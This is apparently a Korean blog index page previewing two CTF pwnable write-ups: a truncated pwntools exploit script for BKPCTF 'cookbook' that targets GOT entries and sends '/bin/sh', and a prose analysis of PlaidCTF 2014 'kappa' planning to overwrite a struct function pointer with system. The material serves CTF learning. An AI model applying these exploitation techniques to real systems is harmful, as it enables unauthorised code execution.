분류 전체보기
-
BKPCTF cookbookPwnable/CTF 2017. 3. 31. 07:59
123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101from pwn import *p=remote("localhost",9001) def Quit(): p.recvuntil('[q]uit\n') free_got=0x804D018printf_got=0x804d010__libc_start_main_got=0x804D03Cprint p.recvuntil('name?\n')p.sendline("/bin/sh\00") d..
-
-
-
-
PlaidCTF 2014 kappaPwnable/CTF 2017. 3. 14. 18:38
바이너리를 실행시키면 이런식으로 포켓몬 관련 메뉴가 나온다. 일단 이 문제에서는 분석하는게 제일 힘들었다 .. 구조체로 나오는 문제를 별로보질못해서 .. 더 힘든문제였다. 이 부분은 첫 번쨰 메뉴를 선택하고 함수호출 을 또한번 하는데 그쪽부분이다. 보면 TYPE가 두 개로있는데 한가지는 BUF 가 0x214 또 다른 한가지는 0x888부분이다. 그리고 아래 사진과 위 사진을 함께보면 구조체 형태를 알 수 있다. buf + 132 부분을 보면 함수를 호출하는 구조체 배열인데 저 부분을 system 함수로 바꿀 수 있는 시나리오같다. 저 HEX-RAY한 곳데로 + 544 ... , + 310 ... 으로 보면안되고, 저 부분을 그냥 어셈블리로 보면 0X880 등등 으로 보인다. 엄청 큰 수를 보니 딱 봐도 ..
-
-